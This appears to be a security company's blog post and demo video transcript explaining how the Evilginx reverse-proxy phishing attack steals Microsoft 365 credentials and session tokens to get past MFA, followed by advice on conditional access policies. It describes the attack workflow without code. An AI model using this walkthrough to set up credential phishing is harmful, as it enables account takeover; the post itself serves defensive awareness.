Cybercriminals are constantly evolving their methods, and one particularly dangerous attack vector that has been compromising business emails—even those protected by multi-factor authentication (MFA)—is the Evilginx Reverse Proxy attack. In this post, we’ll break down how this attack works, demonstrate its effectiveness, and most importantly, discuss how to defend against it.
Evilginx is an open-source attack tool that can be deployed on a cloud server for as little as $5, with a domain name costing around $10 per year. Because of its accessibility and ease of use, even those with basic technical knowledge can set up this attack within a few hours.
Attackers register a domain that looks nearly identical to a legitimate website, such as a Microsoft login page. Since Microsoft uses various subdomains and URLs, a fraudulent domain can appear convincing at first glance.
The attack usually begins with a phishing email. The recipient may receive an email from a trusted contact—whose account has already been compromised—prompting them to click on a link to view an invoice or another document.
Clicking the link redirects the victim to a phishing page that looks identical to Microsoft’s login portal. The victim, believing it to be legitimate, enters their email and password.
Once the user submits their credentials, Evilginx captures them in real time. If multi-factor authentication is enabled, the victim is prompted to approve the login on their authenticator app or enter a one-time passcode. Once they do, Evilginx intercepts the authentication token, allowing the attacker to take full control of the account.
The intercepted session token is the key to the attack. With this token, the attacker can bypass MFA completely, logging in from any device, anywhere in the world, without needing additional authentication.
Once inside, attackers can access OneDrive files, SharePoint data, emails, and even set up forwarding rules to monitor communications. If they gain access to a global admin account, the damage can be even more severe, allowing them to manipulate settings, create new accounts, or even deploy further attacks.
While this attack is highly effective, there are ways to defend against it. One of the best methods is implementing conditional access policies, which can block these attacks based on specific criteria such as:
If your organization wants to learn more about securing accounts against this attack, reach out to us. We can provide detailed instructions on how to set up protective measures to safeguard your business from these threats.
Cybersecurity is constantly evolving—make sure your defenses are too.
0:02 This is a quick demo video on the Evilginx Reverse Proxy attack. This method is responsible for many business email compromises.
0:12 Even with multi-factor authentication (MFA), this attack can capture authentication codes and bypass security measures.
0:21 We set up an Evilginx cloud server. It’s an open-source attack tool that anyone can download. It costs around $5 to host on a cloud server and $10 per year for a domain.
0:41 This makes it very inexpensive to set up, and someone with basic technical skills could configure it within a few hours.
0:52 We’re going to demonstrate how this works using a Microsoft phishing setup. These setups, called “phishlets,” can also be used to target Facebook, Instagram, Coinbase, and more. Even with MFA enabled, the attack can still succeed.
1:16 We purchased a demo domain, which looks very convincing. If someone saw this domain, they might need to look twice or verify online to confirm its legitimacy. Microsoft has many subdomains, making it easy to trick users.
1:42 These attacks often arrive via phishing emails. A user may receive an email from a compromised contact, asking them to click a link to view an invoice or important document.
2:04 Clicking the link leads to a fake page asking the user to log into Microsoft OneDrive. The victim believes they must enter their credentials to access the document.
2:28 In this demonstration, the user enters their email and password. Since we enabled MFA, they receive an authentication request on their mobile device.
2:48 We approve the request using the Microsoft Authenticator app. This attack also works with text message codes or other MFA methods.
2:59 Once approved, the user is redirected to the real Microsoft site, unaware that their credentials and session token have been stolen.
3:18 Now, let’s switch to the attacker’s side. By running a session command, we can see the captured email, password, and session token.
3:37 The session token is the key to bypassing MFA. Using this, an attacker can log in from any device without needing additional authentication.
3:59 As a test, we use a separate computer and log into “portal.office.com.” Initially, no one is logged in.
4:18 Using a browser extension, we import the stolen session token, refresh the page, and gain full access to the account.
4:31 This attack allows hackers to access OneDrive, SharePoint, and emails. If they compromise a global admin account, they can cause severe damage.
4:54 This demo shows how easily this attack works. However, we have security measures that can prevent it.
5:01 By setting up conditional access policies, organizations can block this attack by restricting access based on IP address or device ID.
5:17 If you’re interested in securing your business, reach out to us. We can provide guidance on setting up these security measures.
5:22 Thanks for watching.
.
Did you enjoy the article above? Did you learn anything new or find it useful? If so, you should also check out the posts below to learn more about similar topics you might find helpful and interesting. While you’re at it, consider sharing this story on your favorite social media platforms to help spread the knowledge and share what you learned with your followers!
The Rise of Reverse Proxy Attacks: How Hackers Bypass Multi-Factor Authentication? In the ever-evolving world of cybersecurity, a new phishing threat has emerged, making it easier for hackers to...
Most people check their bank accounts for large, unusual transactions, but smaller details often go unnoticed. A recent experience reminded me why reviewing every charge is so important. The...
Ensuring the security of Office 365 is critical, especially in a world where cyber threats are constantly evolving. While multi-factor authentication (MFA) and strong passwords add layers of...